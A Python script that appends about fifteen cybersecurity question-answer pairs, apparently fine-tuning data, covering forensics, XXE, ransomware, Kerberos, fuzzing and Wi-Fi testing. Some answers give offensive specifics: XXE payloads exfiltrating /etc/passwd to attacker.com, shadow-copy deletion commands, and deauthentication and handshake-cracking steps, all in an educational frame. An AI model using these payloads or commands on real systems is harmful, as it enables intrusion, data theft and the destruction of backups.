#!/usr/bin/env python3
"""gen_f_fill16.py -- push upgrade_f past 1000 cyber pairs"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

p("What is network forensics and how do you analyse PCAP files?",
  "Network forensics: capture and analysis of network traffic for security investigation; reconstruct attack events from packets. Capture tools: Wireshark (GUI, best for manual analysis); tcpdump (command line: tcpdump -i eth0 -w capture.pcap); tshark (CLI Wireshark); Zeek (automated log generation from PCAP); NetworkMiner (passive network sniffer, extracts files and credentials from PCAP). Wireshark analysis workflow: open PCAP; Statistics > Conversations (see all host pairs with traffic volumes; identify top talkers); Statistics > Protocol Hierarchy (protocol distribution; unusual protocols?); Statistics > IO Graph (traffic over time; identify spikes indicating scanning or exfiltration); Follow TCP/UDP Stream (reconstruct full session; see HTTP requests, credentials, file transfers). Filters: ip.addr == 192.168.1.100 (filter by IP); tcp.port == 443 (filter by port); http.request (all HTTP requests); dns (all DNS traffic); frame contains password (search for string in all packets); tls.handshake.type == 1 (TLS ClientHello -- see all HTTPS connections even if encrypted). Command line with tshark: tshark -r capture.pcap -Y dns -T fields -e dns.qry.name (extract DNS queries); tshark -r capture.pcap -Y http.request -T fields -e ip.src -e http.host -e http.request.uri (HTTP request URIs); tshark -r capture.pcap -Y ftp.request.command (FTP commands including credentials). Extracting files: Wireshark: File > Export Objects > HTTP (extract all files from HTTP responses); or NetworkMiner (automatically extracts files, images, credentials from PCAP). Zeek log analysis: zeek -r capture.pcap; produces: conn.log (all connections), http.log (HTTP requests), dns.log (DNS queries), ssl.log (TLS connections), files.log (extracted file metadata), notice.log (Zeek-generated alerts); analyse with grep or rita (Real Intelligence Threat Analytics). Identifying attacks from PCAP: port scan: many connections to different ports from single source; brute force: many TCP connections to same port (SSH:22, RDP:3389) with small data exchange (failed login); C2 beaconing: regular interval connections to same external IP; DNS tunneling: high volume of DNS queries with long subdomains to single domain; data exfiltration: large outbound data transfer at unusual time; SQL injection: HTTP requests containing UNION SELECT, FROM information_schema in URI or body.")

p("What is the dark web and what security relevance does it have?",
  "Dark web: part of internet accessible only through anonymisation networks (primarily Tor); not indexed by search engines; distinct from deep web (requires authentication but not special software). Tor (The Onion Router): network of volunteer-operated relays; traffic encrypted and routed through 3+ nodes; exit node communicates with destination; source IP hidden from destination; .onion domains: accessible only via Tor; self-authenticating hidden services (address = public key hash). Dark web ecosystem from security perspective: Threat intelligence value: criminal forums (BreachForums, RaidForums before seizure, XSS, Exploit.in): discuss attack techniques, sell tools, post stolen data; monitoring reveals: new data breaches (credential dumps, PII), tools being developed or sold (new malware, exploits for sale), attacker TTPs and target planning, whether your organisation is specifically targeted. Ransomware leak sites: ransomware groups post victim data if ransom not paid; accessible via Tor; monitoring identifies whether your data is posted; groups: LockBit, ALPHV/BlackCat, Clop, Play -- all operated leak sites; dark web scraping services monitor for your organisation name. Credential and data markets: Genesis Market (seized 2023): sold browser fingerprints and session cookies; 2easy, Russian Market: sell logs from info-stealers (browser credentials, cookies, saved passwords); monitoring for your domain credentials. Access brokers: sell initial access to compromised organisations (RDP access, VPN credentials, web shell); buyer uses for ransomware deployment; monitoring for your organisation for sale. Monitoring services: commercial dark web monitoring (Recorded Future, Flashpoint, Cybersixgill, DarkOwl): continuously monitor dark web for your keywords (domain name, executive names, product names, credential format); alert when found. Law enforcement: Tor is legal in most countries; dark web not inherently illegal; illegal content (CSAM, drug markets, fraud) is illegal; FBI, Europol, NCA regularly disrupt dark web markets; seized infrastructure reveals participants; operational security mistakes reveal identities (Silk Road: Ross Ulbricht identified via email; AlphaBay: Alexandre Cazes identified via email). OpSec on dark web: even Tor users make mistakes; language, writing style, operational patterns allow attribution.")

p("How do you test for XML external entity (XXE) vulnerabilities?",
  "XXE (XML External Entity injection): attacker injects malicious XML that references external entities; server parses XML and retrieves external content. How it works: XML supports external entities: XML declaration: DOCTYPE foo [<!ENTITY xxe SYSTEM file:///etc/passwd>]; entity reference in document: &xxe;; vulnerable parser resolves entity and includes file content; if application returns entity value in response: content of /etc/passwd returned. Detection: any endpoint accepting XML input potentially vulnerable; XML: SOAP web services, REST APIs with Content-Type: application/xml, SVG upload (SVG is XML), DOCX/XLSX file upload (Office formats are XML in ZIP), XML-based config import. Testing: replace valid XML body with XXE payload: POST /api/items HTTP/1.1; Content-Type: application/xml; Body: add DOCTYPE declaration with external entity; include entity reference in element; observe response for file content. Payloads: basic file read: DOCTYPE foo [<!ENTITY xxe SYSTEM file:///etc/passwd>]; XML: <foo>&xxe;</foo>; Windows: file:///C:/Windows/win.ini; SSRF via HTTP: DOCTYPE foo [<!ENTITY xxe SYSTEM http://attacker.com/xxe>]; SSRF reveals internal services via HTTP request from server. Blind XXE (no output in response): out-of-band exfiltration: DOCTYPE foo [<!ENTITY % file SYSTEM file:///etc/passwd> <!ENTITY % eval <!ENTITY &#x25; exfil SYSTEM http://attacker.com/?data=%file;>> %eval; %exfil;]; server resolves entities and makes HTTP request to attacker with file content. Error-based blind XXE: trigger XML parser error that includes file content in error message (not all parsers support this). Impact: local file read (configuration files with credentials, /etc/passwd, SSH keys); SSRF (reach internal services, AWS metadata); DoS (Billion Laughs attack: exponentially expanding entities exhaust memory). Mitigation: disable XML external entity processing: Java (SAXParserFactory.setFeature(http://xml.org/sax/features/external-general-entities, false)); Python (lxml: resolve_entities=False); PHP (libxml_disable_entity_loader(true) -- PHP < 8.0); use JSON APIs instead of XML where possible; input validation (strip DOCTYPE if not needed); OWASP XXE prevention cheat sheet has language-specific mitigations.")

p("What is digital rights management (DRM) and its security aspects?",
  "DRM (Digital Rights Management): technology to control use and distribution of digital content; restricts copying, printing, sharing, time-limited access. Use cases: streaming video (Netflix, Disney+): prevent screen recording and download; music (Spotify, Apple Music): prevent download and permanent copy; ebooks (Kindle, Adobe Digital Editions): prevent sharing and copying; software licensing: prevent unauthorised installation; enterprise documents (Microsoft Azure Rights Management, Adobe Acrobat Rights Management): control document access and editing. How DRM works: content encrypted with content key; content key encrypted with rights management server key; player software authorised by rights server receives content key; player decodes content; without authorisation: content unreadable; HDCP (High-bandwidth Digital Content Protection): encrypts signal between device and display (HDMI, DisplayPort); prevents capture at display level. Widevine (Google): DRM used by Netflix, Amazon, YouTube; three security levels: L1 (hardware-based, most secure, required for 4K), L2, L3 (software-based, easily bypassed); FairPlay (Apple): iOS/macOS/Safari exclusive; PlayReady (Microsoft). Circumvention: screen capture (user-mode screen grabber: often blocked by DRM at OS level via DRM-protected buffers; hardware capture card captures HDMI signal after DRM decoded; analogue hole: camera records screen); Widevine L3 bypass: software-based L3 DRM reversed; content key extractable with Frida hooking; Widevine L1 requires hardware TEE (Trusted Execution Environment) to protect keys; software-based tools (RVT -- Raw Video Tools) decrypt streams. Trusted Execution Environment (TEE): ARM TrustZone, Intel SGX, AMD SME: isolate security-sensitive code from OS; DRM operations inside TEE: OS compromise cannot extract content key; SGX previously used by Widevine; Intel SGX deprecated by Intel 2022. Legal aspects: DMCA Section 1201 (US): circumventing DRM protection illegal even for legal purposes (making personal backup of legally purchased disc); EU Copyright Directive similar provisions; researchers received DMCA exemptions for security research; security researchers must navigate carefully.")

p("What is a ransomware attack and how does it work technically?",
  "Ransomware: malware that encrypts victim files and demands payment for decryption key; most damaging and common cyber threat. Attack chain: Initial Access: phishing email (most common), VPN brute force or credential stuffing, RDP exposed to internet, exploit public-facing vulnerability (Exchange, VPN, firewall), supply chain or MPS (Managed Service Provider) compromise. Execution and establishment: deploy loader or dropper; inject into legitimate processes; establish C2 communication; beacon to C2 server. Reconnaissance and lateral movement: enumerate network (arp tables, AD, shares); identify backup systems, critical servers, domain controllers; lateral movement via PtH, PtT, WMI, PSExec; disable AV and EDR if possible; escalate privileges to Domain Admin. Exfiltration (double extortion): exfiltrate sensitive data before encryption; Rclone or cloud storage sync; provides second leverage (publish data if no ransom); triple extortion: also threaten to DDoS or contact customers. Encryption: deploy ransomware to all systems simultaneously (GPO, PSExec, Cobalt Strike); file encryption: hybrid encryption (asymmetric RSA or ECC to protect symmetric AES key; AES-256 encrypts files; unique key per file; master key encrypted with attacker public key; victim needs master key decryption from attacker); target file extensions: documents, databases, images; skip: Windows system files (OS must run for victim to see ransom note); ransom note: dropped in each directory. Volume Shadow Copies: delete VSS backups: vssadmin delete shadows /all /quiet; wmic shadowcopy delete; bcdedit /set {default} recoveryenabled No. Network spread: ransomware uses EternalBlue (SMB), WMI, PSExec to spread to all reachable hosts; crypto-worm functionality. Notable families: LockBit (most prolific 2022-2024; affiliate model; fast encryption; Windows and Linux/ESXi variants); ALPHV/BlackCat (Rust-based; cross-platform; advanced capabilities); Clop (focus on MOVEit, GoAnywhere file transfer exploits); Ryuk/Conti (targeted enterprise; high ransom demands; affiliated with TrickBot). Defences: offline backups (3-2-1 rule: 3 copies, 2 media types, 1 offsite; test restoration); MFA everywhere; patch RDP, VPN, Exchange promptly; EDR; network segmentation (limit blast radius); disable SMBv1; CISA ransomware guidance; immutable storage (AWS S3 Object Lock, Veeam immutable backups).")

p("How does cloud identity federation work?",
  "Cloud identity federation: allow users to authenticate with existing identity provider (IdP) rather than separate cloud credentials; single sign-on for cloud services. Protocols: SAML 2.0 (Security Assertion Markup Language): XML-based; enterprise standard; IdP (Okta, AD FS, Ping Identity, Azure AD) issues XML assertions; SP (Service Provider) validates assertion; browser redirects carry assertions; stateless; used for enterprise SSO to web apps. OIDC (OpenID Connect): JSON/JWT based; OAuth 2.0 extension; modern; preferred for APIs and mobile; IdP issues ID token (JWT) to app after authentication; app validates JWT signature and claims; used by Google, Microsoft, Okta. OAuth 2.0: authorisation (not authentication by itself); app gets access token to call APIs on user behalf; scopes limit access; combined with OIDC for both authentication and authorisation. Federation flow (SAML): user attempts to access SP (app); SP redirects to IdP with SAML request; user authenticates at IdP (with MFA); IdP issues signed SAML assertion (contains user attributes, group memberships, validity period); user browser POSTs assertion to SP; SP validates signature using IdP certificate; SP creates session; user authenticated. AWS federation: IAM Identity Center (formerly SSO): federate with any SAML/OIDC IdP; role mapping (AD group = AWS IAM role); temporary credentials via STS AssumeRoleWithSAML or AssumeRoleWithWebIdentity; CLI access: aws configure sso; no long-lived access keys needed. Azure AD B2B: federate with external Azure AD tenants or IdPs; guest accounts; cross-organisation collaboration. Workload identity federation: allow workload (GitHub Actions, GCP workload, Azure managed identity) to assume cloud role without static secrets; GitHub Actions OIDC: GitHub issues JWT; AWS STS validates JWT signature using GitHub JWKS endpoint; exchanges for temporary AWS credentials; no stored secrets in GitHub; Google Workload Identity Federation similarly. Security considerations: IdP compromise = all federated SP compromised; MFA must be enforced at IdP level (not SP); validate assertion signatures and certificate; check assertion validity period; prevent assertion replay; SAML signature wrapping attacks; JSON injection in OIDC claims.")

p("What is ethical hacking and how do you get started?",
  "Ethical hacking: authorised simulation of real-world attacks to identify security weaknesses; same techniques as malicious hackers but with permission and for defensive purpose. Role titles: Penetration Tester (pentester): primary role; conducts authorised tests; red teamer: simulates advanced persistent threat; more long-term and realistic engagement; security researcher: finds vulnerabilities in systems or software; bug bounty hunter: participates in bug bounty programs; offensive security engineer: builds and maintains offensive tools and capabilities. Skills needed: networking: TCP/IP, protocols, firewalls, VPN, DNS; operating systems: Linux (Kali, Parrot OS) and Windows administration; scripting: Python, Bash, PowerShell; web application: HTTP, HTML, JavaScript, SQL; specific vulnerability knowledge (OWASP Top 10, CVE research); tools: Nmap, Burp Suite, Metasploit, Wireshark, Hashcat. Learning path: free: Hack The Box (HTB): gamified hacking challenges; active and retired machines; guided paths; TryHackMe: guided learning rooms from beginner to advanced; PentesterLab: web application focused; VulnHub: downloadable vulnerable VMs; HackTheBox Academy: structured curriculum; PortSwigger Web Security Academy: excellent free web security labs (all OWASP topics with hands-on labs). Paid courses: Offensive Security PEN-200 (OSCP): most respected; INE PTS (eJPT): entry level; TCM Security (practical focused, affordable). Build home lab: VirtualBox or VMware; Metasploitable (intentionally vulnerable Linux); DVWA (Damn Vulnerable Web Application); Windows Server evaluation (free 180 days); Practice escalating complexity. Certifications: OSCP (most valued by employers); CEH (Certified Ethical Hacker: more theoretical; less respected technically but widely recognised in job postings); CompTIA Security+ (good foundation; not offensive focused); GPEN, GWAPT (SANS GIAC: expensive but respected); eJPT (entry level; good start). Legal: always have written permission before testing any system; bug bounty programs provide legal safe harbour within scope; never test without explicit authorisation; even testing your own systems on shared hosting violates ToS. Career: pentesting roles: junior: $70-90K; mid: $90-130K; senior: $130-180K+; specialisations (cloud pentesting, ICS/OT, hardware, mobile, reverse engineering) command premium.")

p("How do you investigate a phishing email?",
  "Phishing email investigation: determine malicious intent, extract IoCs, protect organisation. Header analysis: open raw email headers (Gmail: Show Original; Outlook: View > All Headers); key headers: From (display name and email address): check if display name says CEO but email is randomdomain.com; Reply-To: if different from From -- suspicious; Return-Path: where bounces go; usually different from From in phishing; Received: trace path of email through mail servers (first Received = closest to recipient); X-Originating-IP or X-Sender-IP: original sender IP. Authentication headers: Authentication-Results: shows SPF, DKIM, DMARC results; fail on all three = highly suspicious; pass on SPF but fail DMARC alignment = sophisticated spoofing. URL analysis: extract all links; do not click directly; safe analysis: VirusTotal URL scanner; URLScan.io (render and screenshot page without visiting); urlhaus.abuse.ch; manually defang URLs by replacing . with [.] (https[://]malicious[.]com); check domain age: WHOIS (newly registered domains common in phishing); check domain reputation (Talos, URLHaus). Attachment analysis: if present: extract in sandbox (don't open on live system); ANY.RUN, Hybrid Analysis, Cuckoo sandbox; hash the file (sha256sum): check VirusTotal; strings analysis for URLs, C2, hardcoded values; file type: check magic bytes not just extension (doc.exe is executable regardless of icon); macro-enabled Office: extract macros with oledump.py or oletools. IOC extraction: sender IP, sending domain, URLs, attachment hash, embedded domains in document, email subject line (correlate with threat intelligence). Response actions: delete from all mailboxes (Office 365: New-ComplianceSearch / Start-ComplianceSearchAction -Purge; Google Workspace: GAM tool); block sender domain/IP in email gateway; add URLs to web proxy blocklist; add file hash to EDR blacklist; notify affected users. If user clicked: run EDR scan on user machine; check for persistence; reset credentials; check for lateral movement. Threat intelligence: run all IoCs through TIP; check if known phishing campaign; if novel campaign: share with ISAC; report to PhishTank, Anti-Phishing Working Group (APWG).")

p("What is the difference between symmetric and asymmetric cryptography?",
  "Symmetric vs Asymmetric cryptography: two fundamental paradigms with different properties and use cases. Symmetric cryptography: same key used for encryption and decryption; sender and receiver must share secret key securely beforehand; efficient (fast, low CPU); suitable for large data volumes; key distribution problem (how do parties share key securely over untrusted channel?); examples: AES (most widely used symmetric cipher), 3DES (legacy, deprecated), ChaCha20 (used in TLS 1.3, mobile -- software-efficient), DES (legacy, broken). Asymmetric (public-key) cryptography: key pair: public key (shared openly) and private key (kept secret); mathematically related; what one key encrypts, the other decrypts; encrypt with public key: only private key decrypts; sign with private key: public key verifies signature; examples: RSA (integer factorisation hardness), ECC (Elliptic Curve Cryptography -- discrete log on EC; smaller keys for equivalent security; P-256, P-384, Curve25519), DH/ECDH (Diffie-Hellman key exchange); slower than symmetric (100-1000x); key distribution solved (public key can be shared openly); does not require prior secret exchange. How they combine: hybrid encryption: use asymmetric to securely exchange symmetric key; then use symmetric for bulk data encryption; TLS: ECDHE (asymmetric) establishes session key; AES-GCM (symmetric) encrypts data; RSA/ECDSA signature verifies certificate; S/MIME: AES encrypts email body; RSA/ECC encrypts AES key with recipient public key; PGP same hybrid approach. Key sizes comparison: RSA 2048-bit equivalent security to ECC 256-bit (P-256) equivalent to AES 128-bit; RSA 3072 = ECC 256 (NIST) = AES 128; RSA 4096 = ECC 384 = AES 192; RSA 15360 = ECC 512 = AES 256 (quantum-safe level). Post-quantum cryptography: current asymmetric algorithms (RSA, ECC, DH) broken by Shor algorithm on quantum computer; symmetric (AES) halved in security by Grover algorithm (AES-256 becomes equivalent to AES-128); NIST post-quantum standards (2024): CRYSTALS-Kyber (ML-KEM) for key encapsulation, CRYSTALS-Dilithium (ML-DSA) for signatures; migration planning needed now for long-lived secrets and infrastructure.")

p("How do you perform web application fuzzing?",
  "Web application fuzzing: automated generation of unexpected inputs to discover crashes, errors, and security vulnerabilities. Types: Dumb fuzzing: random input without understanding format; mutate valid inputs randomly; faster to set up; misses logic-aware issues; Smart/grammar-based: generate inputs conforming to expected format; more efficient at reaching deep code paths; application-aware. Tools: ffuf (Fast Fuzzer): Golang; extremely fast; HTTP fuzzing; multi-wordlist; filter responses; ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,204,301,302 (directory brute force); ffuf -u http://target.com/page -d param=FUZZ -w payloads.txt (parameter fuzzing); wfuzz: older Python tool; similar to ffuf; Burp Intruder: GUI-based; slower but integrated with proxy; Burp Turbo Intruder: faster Burp extension for race conditions and high-speed attacks; radamsa: mutation fuzzer; mutates valid sample inputs; AFL++ (American Fuzzy Lop): coverage-guided binary fuzzer; modifies inputs to increase code coverage; most powerful for compiled binaries; LibFuzzer: in-process fuzzer for libraries; guided by sanitisers. Wordlists for web fuzzing: SecLists (Daniel Miessler): comprehensive collection; directories (Discovery/Web-Content/), usernames, passwords, parameters, extensions, subdomains; raft-large-files.txt, raft-medium-directories.txt commonly used. Directory and file discovery: ffuf -u http://target.com/FUZZ -w raft-medium-directories.txt -mc 200,204,301,302,307,401,403; look for unexpected directories (admin, backup, old, dev, test, api, upload). Parameter fuzzing: ffuf -u http://target.com/page?FUZZ=test -w burp-parameter-names.txt (discover hidden parameters); useful for finding SSRF, LFI, RFI, injection parameters not documented. Extension fuzzing: ffuf -u http://target.com/page.FUZZ -w extensions.txt (find backup files: page.bak, page.old, page~, page.swp). Subdomain fuzzing: ffuf -u http://FUZZ.target.com -w subdomains.txt -H Host: FUZZ.target.com -fc 302 (virtual hosting). API endpoint fuzzing: fuzz REST endpoints, HTTP methods, content types; discover undocumented endpoints. Corpus-based: collect all valid requests from proxy; use as mutation base; Burp: save all requests as corpus for ffuf or radamsa.")

p("What is a honeypot versus a honeynet?",
  "Honeypot: single decoy system designed to attract attackers; limited scope; simulates specific service or system. Honeynet: network of multiple honeypots; provides more realistic environment; attacker interacts with multiple systems; more intelligence gathered; harder for sophisticated attackers to identify as honeypot (single honeypot with no neighbours is suspicious). Honeynet architecture: multiple honeypots (simulated workstations, servers, database, domain controller); honeywall/data control layer (between honeypots and internet): allows inbound connections; restricts outbound (attacker cannot use honeypots to attack others); captures all traffic in both directions; data capture layer: full packet capture, system-level logging, keystroke capture; data analysis layer: correlate, analyse, report on captured data. Honeynet generations: first gen: static honeynets, simple capture, easy to detect; second gen: improved data control (rate limiting outbound); dynamic routing; more realistic; third gen: self-contained virtualised networks; commercial and research solutions. Research vs production: research honeynet: gather threat intelligence; study attack techniques; deployed in DMZ or at Internet exchanges; accept high interaction (actual OS, real services); Honeynet Project: non-profit deploying global research honeynets. Production honeynet: deployed inside enterprise network; detect attackers who breach perimeter; early warning system; any connection to honeypot = likely attacker (no legitimate business use); alerts = high fidelity (very low false positive rate). Distributed honeynets: GreyNoise (commercial): large honeynet distributed globally; distinguishes background internet noise from targeted scanning; data sold as threat intelligence; Shodan honeypots: researchers deploy internet-connected honeypots; study scanning and exploitation patterns. Examples: Project Honey Pot: distributed honeypots for spam trap; Spamhaus: distributed honeypots catching spambots; T-Pot: ready-to-deploy honeynet on Debian; includes 20+ honeypot services (Cowrie SSH/Telnet, Dionaea malware capture, Elasticpot, Gridpot, Heralding, etc.); Elasticsearch/Kibana dashboard. Modern evolutions: Cyber Deception platforms: enterprise-grade honeypot management; Attivo Networks (acquired by SentinelOne); Illusive Networks; TrapX; integrate with SIEM; automated response (isolate attacker source IP when honeypot touched); breadcrumbs (fake credentials left on systems that lead to honeypots when used).")

p("What is DMARC failure analysis?",
  "DMARC failure analysis: investigating why emails fail DMARC authentication to fix legitimate email delivery or identify spoofing. DMARC reports: DMARC aggregate reports (RUA): daily XML reports from major email providers (Google, Microsoft, Yahoo, etc.); show: total messages, SPF/DKIM/DMARC pass/fail counts, source IPs, envelope from domains; processed by DMARC analysis tools: Postmark, MXToolbox, dmarcian, Valimail, Google Postmaster Tools. Interpreting failures: SPF failure, DKIM pass, DMARC pass: DMARC uses DKIM for alignment -- OK as long as one passes with alignment; SPF pass, DKIM fail, DMARC pass: DMARC uses SPF for alignment -- OK if SPF sender domain aligns with From header domain; SPF fail, DKIM fail, DMARC fail: legitimate issue (not in SPF record, DKIM not configured) or spoofing/phishing. DMARC alignment: strict: From domain must exactly match; relaxed (default): From domain subdomain match allowed; mail.corp.com aligns with From: user@corp.com. Common failure causes for legitimate email: email service not in SPF record: add new marketing platform (Mailchimp, HubSpot, Marketo, Salesforce Pardot); update SPF TXT record to include it; SPF exceeds 10 DNS lookup limit: too many include: mechanisms; use SPF flattening tools; forwarding breaks SPF: when email forwarded, source IP changes; DKIM still passes (content unchanged); SPF fails; ARC (Authenticated Received Chain) helps; signature key rotation without updating DNS: DKIM private key changed; DNS record not updated; all outbound mail fails DKIM. Spoofing investigation: DMARC report shows unknown IPs sending email with your From domain; check if IP is known threat actor; check if it is legitimate third-party service (new vendor?); block unauthorised sending if DMARC in enforcement (p=quarantine or p=reject). Policy progression: p=none: monitor only; collect reports; fix legitimate failures; move to p=quarantine: suspicious email goes to spam; fix any remaining failures; move to p=reject: all failing email rejected; subdomain policy: sp=reject blocks spoofing of sub.corp.com while main corp.com at p=none during transition.")

p("How does Kerberos authentication work in detail?",
  "Kerberos: network authentication protocol using tickets; eliminates password transmission over network; Windows Active Directory primary authentication mechanism. Components: KDC (Key Distribution Center): runs on DC (Domain Controller); two services: AS (Authentication Service) and TGS (Ticket Granting Service); each user and service has long-term secret (NTLM hash derived from password); realm = Kerberos domain (Active Directory domain). Full authentication flow: (1) AS-REQ: client sends authentication request to KDC AS: username, encrypted timestamp (pre-authentication; encrypted with password hash -- proves knowledge of password without sending it). (2) AS-REP: KDC verifies timestamp; if valid: issues TGT (Ticket Granting Ticket): encrypted with krbtgt account hash (only KDC can decrypt); contains: user identity, session key, expiry (default 10 hours), PAC (Privilege Attribute Certificate: group memberships, user rights); also returns: session key encrypted with user hash. (3) TGS-REQ: client wants to access service; sends to KDC TGS: TGT + SPN (Service Principal Name) of target service + authenticator (timestamp encrypted with TGT session key). (4) TGS-REP: KDC decrypts TGT (only KDC can); validates authenticator; issues service ticket: encrypted with service account hash (only target service can decrypt); contains: user identity, PAC, new session key; returns session key encrypted with TGT session key. (5) AP-REQ: client sends service ticket to target service + authenticator encrypted with service session key. (6) AP-REP: service decrypts ticket with its own hash; validates authenticator; extracts PAC (group memberships); performs authorisation decision; optionally sends mutual authentication response. Key security properties: passwords never transmitted; tickets contain PAC (cached group memberships -- DC not consulted for every resource access); replay protection: authenticator timestamp valid only 5 minutes; KDC must be trusted and secured (krbtgt hash = golden ticket; service account hash = silver ticket). Delegation: constrained delegation: service can authenticate to specific other services as user; unconstrained delegation: service can authenticate to any service as user (dangerous); resource-based constrained delegation (RBCD): target resource controls who can delegate to it.")

p("What is output encoding and when should you use it?",
  "Output encoding: convert data to safe representation for specific output context; prevents injection attacks. Different contexts require different encoding: HTML context (between tags): HTML entity encode: < becomes &lt;, > becomes &gt;, & becomes &amp;, double quote becomes &quot;, single quote becomes &#x27;; encoded characters display correctly to user but browser treats as text not markup; prevents XSS where attacker tries to inject HTML tags. HTML attribute context: HTML attribute encode; same as HTML plus all non-alphanumeric characters encoded; attribute values should always be quoted: value= vs value= (unquoted attributes context-dependent); never put user data in href, src, action, on* event handlers, style (different contexts). JavaScript context: JavaScript encode; encode all non-alphanumeric characters as Unicode escape sequences (\\uXXXX); prevents injection of JavaScript code; never put user data inside string delimiters without encoding; never use eval() or innerHTML with user data. URL context: URL encoding (percent encoding): spaces become %20, special chars encoded; use encodeURIComponent() for parameter values; encodeURI() for full URL (does not encode URL delimiters like /); never concatenate user input directly into URL without encoding. CSS context: CSS encode all non-alphanumeric chars; user data in CSS context rare and high risk; easier to validate against allowlist than encode. SQL context: parameterised queries (not output encoding); prepared statements prevent SQL injection more reliably than encoding/escaping; if parameterised queries impossible: database-specific escaping (mysql_real_escape_string in PHP -- last resort). Command context: never pass user input to shell commands; use language APIs that avoid shell (subprocess without shell=True in Python; ProcessBuilder in Java); if unavoidable: allowlist validation only (not escaping -- escaping is error-prone). Context ordering: determine output context FIRST; select appropriate encoding; apply consistently (one missed encoding = XSS); use trusted libraries (OWASP Java Encoder, .NET AntiXSS, Ruby html_escape, PHP htmlspecialchars with correct flags); correct flags: htmlspecialchars($data, ENT_QUOTES, UTF-8) -- ENT_QUOTES encodes both single and double quotes; character set: always specify UTF-8; mismatch can lead to encoding confusion attacks.")

p("How do you assess wireless network security?",
  "Wireless security assessment: identify vulnerabilities in Wi-Fi infrastructure and connected devices. Hardware and software needed: wireless adapter supporting monitor mode and packet injection (Alfa AWUS036ACH, Alfa AWUS036NH -- older chipsets: Atheros AR9271, Realtek RTL8812AU); Kali Linux with aircrack-ng suite; antenna for extended range if needed. Reconnaissance: airmon-ng start wlan0 (enable monitor mode); airodump-ng wlan0mon (discover all nearby access points); information collected: BSSID (AP MAC), SSID, channel, encryption type (WPA2, WPA3, WEP, Open), cipher (CCMP, TKIP), authentication (PSK, MGT=Enterprise), signal strength, connected clients. WPA2 Personal (PSK) testing: capture 4-way handshake (required for offline cracking): airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon; deauthentication attack to force reconnect (aireplay-ng -0 1 -a BSSID -c CLIENT_MAC wlan0mon); capture handshake when client reconnects; crack offline: hashcat -m 22000 capture.hc22000 wordlist.txt (mode 22000 = WPA PMKID/handshake); rockyou.txt + best64.rule; PMKID attack (no client required): hcxdumptool to capture PMKID from AP; convert with hcxtools; crack with hashcat -m 22000. Enterprise (802.1X) testing: identify authentication protocol: PEAP-MSCHAPv2 (most common); EAP-TTLS; EAP-TLS; hostapd-wpe (Wireless Pwnage Edition): creates rogue AP that captures MSCHAPv2 credentials; crack with asleap (hashcat soon); certificate validation: if client validates server certificate: rogue AP fails (correct configuration); if not validating: MITM; configure test: does client connect to rogue AP with self-signed cert? Identify misconfigurations: open networks (no encryption); WEP (broken -- IV collision attack recovers key in minutes); WPS enabled (Pixie Dust and online bruteforce attacks against WPS PIN); TKIP (deprecated -- vulnerable to TKIP attacks); default SSID and password on AP; SSID broadcasting unnecessary information (corporate name, location). Client-side: evil twin attack; deauth targeted clients from real AP; they reconnect to evil twin; MitM. Reporting: list all SSIDs and encryption types; identify weak encryption; captive portal assessment; rogue AP detection; client isolation (can clients reach each other on guest network?); network separation (guest from corporate).")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f TARGET MET -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
